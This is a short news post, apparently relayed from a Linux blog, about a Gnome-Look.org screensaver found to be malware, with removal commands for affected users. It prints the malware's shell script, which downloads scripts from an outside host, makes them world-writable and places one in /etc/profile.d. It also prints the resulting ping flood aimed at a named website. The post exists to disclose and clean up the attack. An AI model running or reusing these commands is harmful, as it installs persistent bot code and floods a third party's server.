A desktop screensaver available from Gnome-Look.org was reported to be a malware, which downloads an unauthorized script. This script is believed to enable a possible DDoS attack. The screensaver has been immediately removed from the website after the malware was confirmed at this thread at Ubuntu forums.
The malware posing as a screensaver has a script:
#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit
The ultimate result of this command is:
ping -s 65507 www.mmowned.com
This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DOS attacks. This can be a good prank revenge on the company or, this can be a part of something big by making all these affected computers into bots.
If you have already installed the screensaver, remove it and protect your computer by issuing the commands:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
sudo dpkg -r app5552
[ Via OMG! UBUNTU! ]